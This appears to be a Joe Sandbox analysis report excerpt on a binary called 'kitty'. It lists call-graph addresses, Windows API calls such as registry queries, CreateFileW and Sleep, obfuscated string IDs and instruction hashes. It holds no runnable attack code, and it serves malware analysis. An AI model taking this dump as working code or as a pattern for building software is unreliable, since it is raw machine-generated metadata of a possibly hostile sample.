cc98f2 27819->27821 27828 cc9e81 27821->27828 27822 cc98cc 27838 cb3f9f 25 API calls __wsopen_s 27822->27838 27825 cc98d6 27825->27789 27840 cc3454 27828->27840 27833 cc9eb7 27835 cc9916 27833->27835 27895 cbbf97 14 API calls _free 27833->27895 27839 cc9949 LeaveCriticalSection __wsopen_s 27835->27839 27837->27822 27838->27825 27839->27825 27896 cb5e2d 27840->27896 27844 cc3478 27845 cb8527 27844->27845 27908 cb8475 27845->27908 27848 cc9f0f 27933 cc9c5d 27848->27933 27851 cc9f5a 27951 cc4c10 27851->27951 27852 cc9f41 27965 cb7c73 14 API calls __dosmaperr 27852->27965 27855 cc9f46 27966 cb7c86 14 API calls __dosmaperr 27855->27966 27857 cc9f7f 27964 cc9bc8 CreateFileW 27857->27964 27858 cc9f68 27967 cb7c73 14 API calls __dosmaperr 27858->27967 27862 cc9f6d 27968 cb7c86 14 API calls __dosmaperr 27862->27968 27864 cca035 GetFileType 27865 cca087 27864->27865 27866 cca040 GetLastError 27864->27866 27973 cc4b5b 15 API calls 3 library calls 27865->27973 27971 cb7c50 14 API calls 2 library calls 27866->27971 27867 cca00a GetLastError 27970 cb7c50 14 API calls 2 library calls 27867->27970 27869 cc9fb8 27869->27864 27869->27867 27969 cc9bc8 CreateFileW 27869->27969 27871 cca04e CloseHandle 27871->27855 27873 cca077 27871->27873 27972 cb7c86 14 API calls __dosmaperr 27873->27972 27875 cc9ffd 27875->27864 27875->27867 27877 cca0a8 27879 cca0f4 27877->27879 27974 cc9dd7 71 API calls 4 library calls 27877->27974 27878 cca07c 27878->27855 27883 cca0fb 27879->27883 27976 cc9975 71 API calls 4 library calls 27879->27976 27882 cca129 27882->27883 27884 cca137 27882->27884 27975 cbcc6e 28 API calls 2 library calls 27883->27975 27886 cc9f53 27884->27886 27887 cca1b3 CloseHandle 27884->27887 27886->27833 27977 cc9bc8 CreateFileW 27887->27977 27889 cca1de 27890 cca1e8 GetLastError 27889->27890 27894 cca102 27889->27894 27978 cb7c50 14 API calls 2 library calls 27890->27978 27892 cca1f4 27979 cc4d23 15 API calls 3 library calls 27892->27979 27894->27886 27895->27835 27897 cb5e4d 27896->27897 27898 cb5e44 27896->27898 27897->27898 27905 cbbbf0 37 API calls 3 library calls 27897->27905 27898->27844 27904 cbc3ce 5 API calls std::_Locinfo::_Locinfo_ctor 27898->27904 27900 cb5e6d 27906 cbfe0c 37 API calls __Getctype 27900->27906 27902 cb5e83 27907 cbfe39 37 API calls __fassign 27902->27907 27904->27844 27905->27900 27906->27902 27907->27898 27909 cb849d 27908->27909 27910 cb8483 27908->27910 27911 cb84c3 27909->27911 27912 cb84a4 27909->27912 27926 cb8544 14 API calls _free 27910->27926 27928 cc316f MultiByteToWideChar 27911->27928 27925 cb848d 27912->27925 27927 cb8585 15 API calls __wsopen_s 27912->27927 27916 cb84d9 GetLastError 27929 cb7c50 14 API calls 2 library calls 27916->27929 27918 cb84ff 27918->27925 27932 cc316f MultiByteToWideChar 27918->27932 27919 cb84d2 27919->27916 27919->27918 27931 cb8585 15 API calls __wsopen_s 27919->27931 27922 cb84e5 27930 cb7c86 14 API calls __dosmaperr 27922->27930 27923 cb8516 27923->27916 27923->27925 27925->27833 27925->27848 27926->27925 27927->27925 27928->27919 27929->27922 27930->27925 27931->27918 27932->27923 27934 cc9c7e 27933->27934 27940 cc9c98 27933->27940 27934->27940 27987 cb7c86 14 API calls __dosmaperr 27934->27987 27937 cc9c8d 27988 cb3f9f 25 API calls __wsopen_s 27937->27988 27939 cc9cff 27949 cc9d52 27939->27949 27991 cb9168 25 API calls 2 library calls 27939->27991 27980 cc9bed 27940->27980 27941 cc9cd0 27941->27939 27989 cb7c86 14 API calls __dosmaperr 27941->27989 27944 cc9d4d 27946 cc9dca 27944->27946 27944->27949 27945 cc9cf4 27990 cb3f9f 25 API calls __wsopen_s 27945->27990 27992 cb3fcc 11 API calls __FrameHandler3::FrameUnwindToState 27946->27992 27949->27851 27949->27852 27950 cc9dd6 27952 cc4c1c __FrameHandler3::FrameUnwindToState 27951->27952 27995 cb716d EnterCriticalSection 27952->27995 27954 cc4c23 27956 cc4c48 27954->27956 27959 cc4cb7 EnterCriticalSection 27954->27959 27962 cc4c6a 27954->27962 27999 cc49ea 15 API calls 3 library calls 27956->27999 27961 cc4cc4 LeaveCriticalSection 27959->27961 27959->27962 27960 cc4c4d 27960->27962 28000 cc4b38 EnterCriticalSection 27960->28000 27961->27954 27996 cc4d1a 27962->27996 27964->27869 27965->27855 27966->27886 27967->27862 27968->27855 27969->27875 27970->27855 27971->27871 27972->27878 27973->27877 27974->27879 27975->27894 27976->27882 27977->27889 27978->27892 27979->27894 27982 cc9c05 27980->27982 27981 cc9c20 27981->27941 27982->27981 27993 cb7c86 14 API calls __dosmaperr 27982->27993 27984 cc9c44 27994 cb3f9f 25 API calls __wsopen_s 27984->27994 27986 cc9c4f 27986->27941 27987->27937 27988->27940 27989->27945 27990->27939 27991->27944 27992->27950 27993->27984 27994->27986 27995->27954 28001 cb71b5 LeaveCriticalSection 27996->28001 27998 cc4c8a 27998->27857 27998->27858 27999->27960 28000->27962 28001->27998 28029 cc4682 45 API calls 5 library calls 28116 cb179b 8 API calls 28117 cb1398 50 API calls 2 library calls 28120 caf392 DecodePointer 28031 c93890 65 API calls 28032 c93c90 64 API calls 28121 c94190 55 API calls 3 library calls 28123 cbdb92 32 API calls 4 library calls 28036 cae697 DeleteCriticalSection 28038 caeaab 9 API calls 3 library calls 27360 cab9ac 27361 cab9a0 27360->27361 27361->27360 27362 c94740 std::_Throw_Cpp_error 43 API calls 27361->27362 27363 cabaf3 27362->27363 27364 c94740 std::_Throw_Cpp_error 43 API calls 27363->27364 27366 cabcd3 27364->27366 27365 c94740 std::_Throw_Cpp_error 43 API calls 27367 cabe83 27365->27367 27366->27365 27368 c96620 60 API calls 27367->27368 27369 cabe88 27368->27369 27370 cafb9c std::_Facet_Register 16 API calls 27369->27370 27371 cabe8f 27370->27371 27588 cb709b 30 API calls 3 library calls 27371->27588 27374 cabebf 27375 cae30e 27374->27375 27376 cabed0 27374->27376 27634 caf03b 43 API calls std::_Throw_Cpp_error 27375->27634 27589 c9caf0 109 API calls 3 library calls 27376->27589 27380 cabedc 27381 ca3da0 44 API calls 27380->27381 27382 cabee8 27381->27382 27590 ca3c30 44 API calls std::_Throw_Cpp_error 27382->27590 27384 cabef4 27385 c94740 std::_Throw_Cpp_error 43 API calls 27384->27385 27387 cac083 27385->27387 27386 c94740 std::_Throw_Cpp_error 43 API calls 27388 cac263 27386->27388 27387->27386 27389 c99390 47 API calls 27388->27389 27390 cac27e 27389->27390 27391 c91290 std::_Throw_Cpp_error 25 API calls 27390->27391 27392 cac28c 27391->27392 27393 c91290 std::_Throw_Cpp_error 25 API calls 27392->27393 27394 cac297 27393->27394 27395 c94740 std::_Throw_Cpp_error 43 API calls 27394->27395 27396 cac453 27395->27396 27397 c94740 std::_Throw_Cpp_error 43 API calls 27396->27397 27398 cac4b6 27397->27398 27591 ca47c0 27 API calls 3 library calls 27398->27591 27400 cac4c6 27592 ca2a30 27 API calls 5 library calls 27400->27592 27402 cac4d3 27403 c94740 std::_Throw_Cpp_error 43 API calls 27402->27403 27404 cac536 27403->27404 27405 c94740 std::_Throw_Cpp_error 43 API calls 27404->27405 27406 cac59e 27405->27406 27593 ca47c0 27 API calls 3 library calls 27406->27593 27408 cac5ab 27594 ca2a30 27 API calls 5 library calls 27408->27594 27410 cac5b8 27411 c94740 std::_Throw_Cpp_error 43 API calls 27410->27411 27412 cac619 27411->27412 27413 c94740 std::_Throw_Cpp_error 43 API calls 27412->27413 27414 cac658 27412->27414 27415 cac68d 27413->27415 27595 ca47c0 27 API calls 3 library calls 27415->27595 27417 cac69a 27596 ca2a30 27 API calls 5 library calls 27417->27596 27419 cac6a7 27420 c94740 std::_Throw_Cpp_error 43 API calls 27419->27420 27421 cac70c 27420->27421 27422 c94740 std::_Throw_Cpp_error 43 API calls 27421->27422 27423 cac77d 27422->27423 27597 ca47c0 27 API calls 3 library calls 27423->27597 27425 cac78a 27598 ca2a30 27 API calls 5 library calls 27425->27598 27427 cac797 27428 c94740 std::_Throw_Cpp_error 43 API calls 27427->27428 27429 cac7ea 27428->27429 27430 c94740 std::_Throw_Cpp_error 43 API calls 27429->27430 27431 cac84f 27430->27431 27599 ca47c0 27 API calls 3 library calls 27431->27599 27433 cac85c 27600 ca2a30 27 API calls 5 library calls 27433->27600 27435 cac869 27436 c94740 std::_Throw_Cpp_error 43 API calls 27435->27436 27437 cac8bc 27436->27437 27438 c96440 27 API calls 27437->27438 27439 cac8ce 27438->27439 27440 c96440 27 API calls 27439->27440 27441 cac8e6 27440->27441 27442 c96440 27 API calls 27441->27442 27443 cac8fb 27442->27443 27444 c96440 27 API calls 27443->27444 27445 cac913 27444->27445 27446 c96440 27 API calls 27445->27446 27447 cac92e 27446->27447 27448 c96440 27 API calls 27447->27448 27449 cac949 27448->27449 27450 c96440 27 API calls 27449->27450 27451 cac964 27450->27451 27452 c96440 27 API calls 27451->27452 27453 cac97f 27452->27453 27454 c96440 27 API calls 27453->27454 27455 cac997 27454->27455 27456 c91290 std::_Throw_Cpp_error 25 API calls 27455->27456 27457 cac9a2 27456->27457 27458 c91290 std::_Throw_Cpp_error 25 API calls 27457->27458 27459 cac9ad 27458->27459 27460 c91290 std::_Throw_Cpp_error 25 API calls 27459->27460 27461 cac9b8 27460->27461 27462 c91290 std::_Throw_Cpp_error 25 API calls 27461->27462 27463 cac9c3 27462->27463 27464 c91290 std::_Throw_Cpp_error 25 API calls 27463->27464 27465 cac9ce 27464->27465 27466 c91290 std::_Throw_Cpp_error 25 API calls 27465->27466 27467 cac9d6 27466->27467 27468 c91290 std::_Throw_Cpp_error 25 API calls 27467->27468 27469 cac9e1 27468->27469 27470 c91290 std::_Throw_Cpp_error 25 API calls 27469->27470 27471 cac9ec 27470->27471 27472 c91290 std::_Throw_Cpp_error 25 API calls 27471->27472 27473 cac9f7 27472->27473 27474 c91290 std::_Throw_Cpp_error 25 API calls 27473->27474 27475 caca02 27474->27475 27476 c91290 std::_Throw_Cpp_error 25 API calls 27475->27476 27477 caca0d 27476->27477 27478 c91290 std::_Throw_Cpp_error 25 API calls 27477->27478 27479 caca18 27478->27479 27480 c91290 std::_Throw_Cpp_error 25 API calls 27479->27480 27481 caca23 27480->27481 27482 c91290 std::_Throw_Cpp_error 25 API calls 27481->27482 27483 caca2e 27482->27483 27484 c91290 std::_Throw_Cpp_error 25 API calls 27483->27484 27485 caca39 27484->27485 27486 c91290 std::_Throw_Cpp_error 25 API calls 27485->27486 27487 caca44 27486->27487 27488 c91290 std::_Throw_Cpp_error 25 API calls 27487->27488 27489 caca4f 27488->27489 27490 c91290 std::_Throw_Cpp_error 25 API calls 27489->27490 27491 caca5a 27490->27491 27492 c91290 std::_Throw_Cpp_error 25 API calls 27491->27492 27493 caca65 27492->27493 27494 c91290 std::_Throw_Cpp_error 25 API calls 27493->27494 27495 caca70 27494->27495 27496 c91290 std::_Throw_Cpp_error 25 API calls 27495->27496 27497 caca7b 27496->27497 27498 c91290 std::_Throw_Cpp_error 25 API calls 27497->27498 27499 caca86 27498->27499 27500 c91290 std::_Throw_Cpp_error 25 API calls 27499->27500 27501 caca91 27500->27501 27502 c91290 std::_Throw_Cpp_error 25 API calls 27501->27502 27503 caca9c 27502->27503 27504 c91290 std::_Throw_Cpp_error 25 API calls 27503->27504 27505 cacaa7 27504->27505 27506 c91290 std::_Throw_Cpp_error 25 API calls 27505->27506 27507 cacab2 27506->27507 27508 c91290 std::_Throw_Cpp_error 25 API calls 27507->27508 27509 cacabd 27508->27509 27510 c91290 std::_Throw_Cpp_error 25 API calls 27509->27510 27511 cacac8 27510->27511 27512 c91290 std::_Throw_Cpp_error 25 API calls 27511->27512 27514 cacad3 27512->27514 27513 c91820 std::_Throw_Cpp_error 43 API calls 27513->27514 27514->27513 27515 caccf3 27514->27515 27516 c91290 std::_Throw_Cpp_error 25 API calls 27514->27516 27517 cacd21 27515->27517 27529 cacd0e _Yarn 27515->27529 27516->27514 27601 c917c0 16 API calls std::_Facet_Register 27517->27601 27522 c95610 26 API calls std::invalid_argument::invalid_argument 27586 cacd9a 27522->27586 27524 cae204 Sleep 27633 c9c130 25 API calls 2 library calls 27524->27633 27525 cb0a90 RaiseException std::_Throw_Cpp_error 27525->27586 27530 c91290 std::_Throw_Cpp_error 25 API calls 27529->27530 27602 c9bc80 16 API calls 2 library calls 27529->27602 27603 c9a370 27 API calls std::_Throw_Cpp_error 27529->27603 27604 c95880 49 API calls 4 library calls 27529->27604 27530->27529 27531 ca47c0 27 API calls 27531->27586 27533 c9bc80 16 API calls 27533->27586 27534 c963c0 27 API calls 27574 cad2ad 27534->27574 27536 cad635 27538 cad6ca 27536->27538 27537 c94740 std::_Throw_Cpp_error 43 API calls 27537->27538 27538->27537 27613 c94780 59 API calls 3 library calls 27538->27613 27540 c91290 25 API calls std::_Throw_Cpp_error 27540->27586 27542 c91290 std::_Throw_Cpp_error 25 API calls 27551 cad6f0 27542->27551 27545 c94740 std::_Throw_Cpp_error 43 API calls 27545->27551 27546 c94740 std::_Throw_Cpp_error 43 API calls 27557 cadc0b 27546->27557 27548 c9a370 27 API calls 27548->27574 27551->27542 27551->27545 27568 cad7ff 27551->27568 27614 ca47c0 27 API calls 3 library calls 27551->27614 27615 ca2a30 27 API calls 5 library calls 27551->27615 27553 c94740 std::_Throw_Cpp_error 43 API calls 27553->27568 27555 c94740 std::_Throw_Cpp_error 43 API calls 27570 cadd0c 27555->27570 27556 c94740 43 API calls std::_Throw_Cpp_error 27556->27586 27557->27546 27557->27570 27622 ca47c0 27 API calls 3 library calls 27557->27622 27623 ca2a30 27 API calls 5 library calls 27557->27623 27562 c994d0 39 API calls 27562->27586 27564 c9bc80 16 API calls 27564->27574 27565 c94740 43 API calls std::_Throw_Cpp_error 27565->27574 27566 c963c0 27 API calls 27566->27570 27567 c963c0 27 API calls 27567->27568 27568->27553 27568->27567 27616 c9bc80 16 API calls 2 library calls 27568->27616 27617 c9a370 27 API calls std::_Throw_Cpp_error 27568->27617 27618 c95880 49 API calls 4 library calls 27568->27618 27570->27555 27570->27566 27624 c9bc80 16 API calls 2 library calls 27570->27624 27625 c9a370 27 API calls std::_Throw_Cpp_error 27570->27625 27626 c95880 49 API calls 4 library calls 27570->27626 27573 c91290 25 API calls std::_Throw_Cpp_error 27573->27574 27574->27534 27574->27548 27574->27564 27574->27565 27574->27573 27609 c929c0 118 API calls 3 library calls 27574->27609 27610 c9e8a0 33 API calls 2 library calls 27574->27610 27611 c95880 49 API calls 4 library calls 27574->27611 27612 c956b0 50 API calls 3 library calls 27574->27612 27620 c95880 49 API calls 4 library calls 27574->27620 27621 c91330 53 API calls __wsopen_s 27574->27621 27627 c929c0 118 API calls 3 library calls 27574->27627 27577 ca2a30 27 API calls 27577->27586 27578 c94740 std::_Throw_Cpp_error 43 API calls 27584 cae0dd 27578->27584 27581 c963c0 27 API calls 27581->27584 27583 c91290 25 API calls std::_Throw_Cpp_error 27583->27584 27584->27578 27584->27581 27584->27583 27628 c9bc80 16 API calls 2 library calls 27584->27628 27629 c9a370 27 API calls std::_Throw_Cpp_error 27584->27629 27630 c95880 49 API calls 4 library calls 27584->27630 27631 c9e8a0 33 API calls 2 library calls 27584->27631 27586->27522 27586->27524 27586->27525 27586->27531 27586->27533 27586->27540 27586->27556 27586->27562 27586->27574 27586->27577 27586->27584 27587 cb585e 23 API calls 27586->27587 27605 c96360 43 API calls std::_Throw_Cpp_error 27586->27605 27606 ca4620 27 API calls 27586->27606 27607 ca3f10 27 API calls 5 library calls 27586->27607 27608 ca50b0 43 API calls 2 library calls 27586->27608 27619 c9c0e0 25 API calls 2 library calls 27586->27619 27632 c9c130 25 API calls 2 library calls 27586->27632 27587->27586 27588->27374 27635 cb6f3f 45 API calls 2 library calls 27588->27635 27589->27380 27590->27384 27591->27400 27592->27402 27593->27408 27594->27410 27595->27417 27596->27419 27597->27425 27598->27427 27599->27433 27600->27435 27601->27529 27602->27529 27603->27529 27604->27586 27605->27586 27606->27586 27607->27586 27608->27586 27609->27586 27610->27586 27611->27586 27612->27536 27613->27551 27614->27551 27615->27551 27616->27568 27617->27568 27618->27586 27619->27586 27620->27586 27621->27557 27622->27557 27623->27557 27624->27570 27625->27570 27626->27586 27627->27586 27628->27584 27629->27584 27630->27584 27631->27586 27632->27586 27633->27529 28044 cb92a1 GetCommandLineA GetCommandLineW 28128 cc69b4 42 API calls 3 library calls 28129 ccb1b4 47 API calls 28132 cb6fb1 25 API calls 2 library calls 28049 cafeb7 26 API calls 28050 cb004b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 28051 cb764a 45 API calls 5 library calls 28052 c9104d 46 API calls 28053 cc1e49 IsProcessorFeaturePresent 28133 c93d40 66 API calls 28057 cc6052 39 API calls 4 library calls 28059 cae86c 16 API calls 2 library calls 28138 cc7164 GetProcessHeap 27636 c9b860 27637 c9b873 27636->27637 27654 ca4210 27637->27654 27644 c9b99e 27684 c92eb0 25 API calls 27644->27684 27646 c9b9c1 27647 c9b9a8 27685 c91a50 68 API calls 3 library calls 27647->27685 27649 c9b9f0 27649->27646 27686 c92310 43 API calls 3 library calls 27649->27686 27651 c9ba4e 27687 cb0a90 RaiseException 27651->27687 27653 c9ba5c 27655 cafb9c std::_Facet_Register 16 API calls 27654->27655 27656 ca426e 27655->27656 27657 ca427e 27656->27657 27711 cae8c0 43 API calls 5 library calls 27656->27711 27688 c91b80 27657->27688 27660 ca42f3 27662 c9b8e1 27660->27662 27712 caed3c 9 API calls 2 library calls 27660->27712 27661 ca42af 27661->27660 27664 ca430a 27661->27664 27669 c9bbe0 27662->27669 27713 c92310 43 API calls 3 library calls 27664->27713 27666 ca433e 27714 cb0a90 RaiseException 27666->27714 27668 ca434c 27670 cafb9c std::_Facet_Register 16 API calls 27669->27670 27671 c9bbfb 27670->27671 27672 c9b900 27671->27672 27724 cae8c0 43 API calls 5 library calls 27671->27724 27674 caef22 27672->27674 27676 caee7c 27674->27676 27675 c9b996 27675->27644 27675->27649 27676->27675 27677 caeedd 27676->27677 27680 caef2b 28 API calls 27676->27680 27682 caeee4 27677->27682 27725 caef2b 27677->27725 27680->27677 27682->27675 27728 cb431b 67 API calls 5 library calls 27682->27728 27684->27647 27685->27646 27686->27651 27687->27653 27715 cae666 7 API calls std::_Lockit::_Lockit 27688->27715 27690 c91b97 27695 c91bd2 27690->27695 27716 cae666 7 API calls std::_Lockit::_Lockit 27690->27716 27692 c91bb2 27717 cae6be LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 27692->27717 27694 c91cb0 27694->27661 27697 c91c19 27695->27697 27698 c91c2c 27695->27698 27709 c91c98 27695->27709 27718 cae6be LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 27697->27718 27700 cafb9c std::_Facet_Register 16 API calls 27698->27700 27703 c91c33 27700->27703 27701 c91c23 27701->27661 27702 c91c72 27704 c91c92 27702->27704 27721 c925f0 64 API calls 2 library calls 27702->27721 27703->27702 27719 c92070 67 API calls 2 library calls 27703->27719 27722 cae88e 16 API calls std::_Facet_Register 27704->27722 27708 c91c60 27720 caead5 41 API calls 3 library calls 27708->27720 27723 cae6be LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 27709->27723 27711->27657 27712->27662 27713->27666 27714->27668 27715->27690 27716->27692 27717->27695 27718->27701 27719->27708 27720->27702 27722->27709 27723->27694 27724->27672 27730 cb7bbe 27725->27730 27728->27675 27729 cb4fec 64 API calls 27729->27682 27731 cb7b07 __FrameHandler3::FrameUnwindToState 27730->27731 27732 cb7b1a 27731->27732 27735 cb7b3a 27731->27735 27755 cb7c86 14 API calls __dosmaperr 27732->27755 27734 cb7b1f 27756 cb3f9f 25 API calls __wsopen_s 27734->27756 27737 cb7b3f 27735->27737 27738 cb7b4c 27735->27738 27757 cb7c86 14 API calls __dosmaperr 27737->27757 27747 cbcd31 27738->27747 27740 caeefd 27740->27675 27740->27729 27743 cb7b69 __Getcoll 27759 cb7ba7 LeaveCriticalSection __fread_nolock __Getcoll 27743->27759 27744 cb7b5c 27758 cb7c86 14 API calls __dosmaperr 27744->27758 27748 cbcd3d __FrameHandler3::FrameUnwindToState 27747->27748 27760 cb716d EnterCriticalSection 27748->27760 27750 cbcd4b 27761 cbcdd5 27750->27761 27755->27734 27756->27740 27757->27740 27758->27740 27759->27740 27760->27750 27762 cbcdf8 27761->27762 27763 cbce50 27762->27763 27770 cbcd58 27762->27770 27778 cb427c EnterCriticalSection 27762->27778 27779 cb4290 LeaveCriticalSection 27762->27779 27780 cbbfd1 14 API calls 3 library calls 27763->27780 27766 cbce59 27781 cbbf97 14 API calls _free 27766->27781 27768 cbce62 27768->27770 27782 cbc618 6 API calls std::_Locinfo::_Locinfo_ctor 27768->27782 27775 cbcd91 27770->27775 27771 cbce81 27783 cb427c EnterCriticalSection 27771->27783 27774 cbce94 27774->27770 27784 cb71b5 LeaveCriticalSection 27775->27784 27777 cb7b55 27777->27743 27777->27744 27778->27762 27779->27762 27780->27766 27781->27768 27782->27771 27783->27774 27784->27777 28060 c9ba60 76 API calls 6 library calls 28063 cac650 162 API calls 3 library calls 28065 cc1e60 15 API calls 28141 cbe179 64 API calls 2 library calls 28071 cb2870 5 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 28145 cb0703 47 API calls _unexpected 28146 c91300 14 API calls 2 library calls 28147 c92700 68 API calls std::ios_base::_Ios_base_dtor 28149 ca2f00 74 API calls 28076 cc6c07 40 API calls 3 library calls 28077 c91005 29 API calls 28078 cafe04 45 API calls __RTC_Initialize 28079 cb0004 23 API calls __FrameHandler3::FrameUnwindToState 28080 c9101b 28 API calls 28151 cb4112 15 API calls 3 library calls 28081 ca0810 29 API calls 28082 cb8211 20 API calls 28084 cae22a 74 API calls ___std_exception_destroy 28154 cbcb29 15 API calls 28085 c9102e 77 API calls 28087 c93620 47 API calls 28155 c93120 LeaveCriticalSection __fread_nolock 28091 cbc83e FreeLibrary 28158 cb8b3c 51 API calls 2 library calls 28092 c93030 EnterCriticalSection __fread_nolock 28159 c95330 27 API calls std::_Throw_Cpp_error 28161 cb1136 37 API calls 2 library calls 28162 cc4f32 41 API calls 3 library calls
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true
                                                          • Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_c90000_kitty.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
                                                          • API String ID: 0-1094075928
                                                          • Opcode ID: 7737b15d3dd9858080fa9e3c43c4f0e1faef7e697431d3befd30cbc04179761f
                                                          • Instruction ID: f31acecdb612db33f24c7c51ce8d1df012424c78284120f9abde855b9c654b02
                                                          • Opcode Fuzzy Hash: 7737b15d3dd9858080fa9e3c43c4f0e1faef7e697431d3befd30cbc04179761f
                                                          • Instruction Fuzzy Hash: 16A3C275D116994AEB06DB74CC42BD9F3B8AF66344F14C3A6E805B6562FB306BC2DB00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1654 c99390-c993a4 1655 c993a8-c993c1 RegOpenKeyExA 1654->1655 1656 c993a6 1654->1656 1657 c993fb-c99415 1655->1657 1658 c993c3-c993d1 1655->1658 1656->1655 1659 c993d3 1658->1659 1660 c993d5-c993f3 RegQueryValueExA 1658->1660 1659->1660 1661 c993f5 RegCloseKey 1660->1661 1662 c99416-c99439 RegCloseKey 1660->1662 1661->1657 1663 c99440-c99445 1662->1663 1663->1663 1664 c99447-c9945e call c91820 1663->1664
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 00C993B9
                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 00C993E8
                                                          • RegCloseKey.ADVAPI32(?), ref: 00C993F5
                                                          • RegCloseKey.KERNELBASE(?), ref: 00C99416
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true
                                                          • Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_c90000_kitty.jbxd
                                                          Similarity
                                                          • API ID: Close$OpenQueryValue
                                                          • String ID:
                                                          • API String ID: 1607946009-0
                                                          • Opcode ID: 5e862055357e1d6297aa0f6a4f32f7c821143c3453c68f68947c10318a7af6f9
                                                          • Instruction ID: 919ea4b6b75c71bc0334beb249a34b390155cc6ca35ba56cb65041d37ff48363
                                                          • Opcode Fuzzy Hash: 5e862055357e1d6297aa0f6a4f32f7c821143c3453c68f68947c10318a7af6f9
                                                          • Instruction Fuzzy Hash: 51216F74100309AFEF25DF18DC48BBA77B8FB04704F00459CE8568B291D7B1AA59CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2457 cc1887-cc18ad call cc165d 2460 cc18af-cc18c1 call cc9eef 2457->2460 2461 cc1906-cc1909 2457->2461 2463 cc18c6-cc18cb 2460->2463 2463->2461 2464 cc18cd-cc1905 2463->2464
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true
                                                          • Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_c90000_kitty.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: c1cb810fcd6f1ce0396526dabf6fa8c4536342ae0c8852751a4158884a19fac3
                                                          • Instruction ID: c8d3254b2ea35c6dfe1b16816535fb282a01f2db15816514e5370393439a6bd1
                                                          • Opcode Fuzzy Hash: c1cb810fcd6f1ce0396526dabf6fa8c4536342ae0c8852751a4158884a19fac3
                                                          • Instruction Fuzzy Hash: 1B111571A0420AAFCB05DF59E945E9A7BF4EF49304F0440A9F819AB252D631EA22CB65

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2479 cc9bc8-cc9bec CreateFileW
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00CC9FB8,?,?,00000000,?,00CC9FB8,00000000,0000000C), ref: 00CC9BE5
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true
                                                          • Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_c90000_kitty.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 00d5d9336dedef3a709c8e5fb3a9ae37ae935225986bb744b123cfc31355dc3d
                                                          • Instruction ID: 9a127b0a94c0e985476e5aebda7ac1872852060d9cbfd06fd83327b414134cf8
                                                          • Opcode Fuzzy Hash: 00d5d9336dedef3a709c8e5fb3a9ae37ae935225986bb744b123cfc31355dc3d
                                                          • Instruction Fuzzy Hash: EDD06C3201014DBBDF028F84DC06EDA3BAAFB48714F014010FE1856020C732E862EB94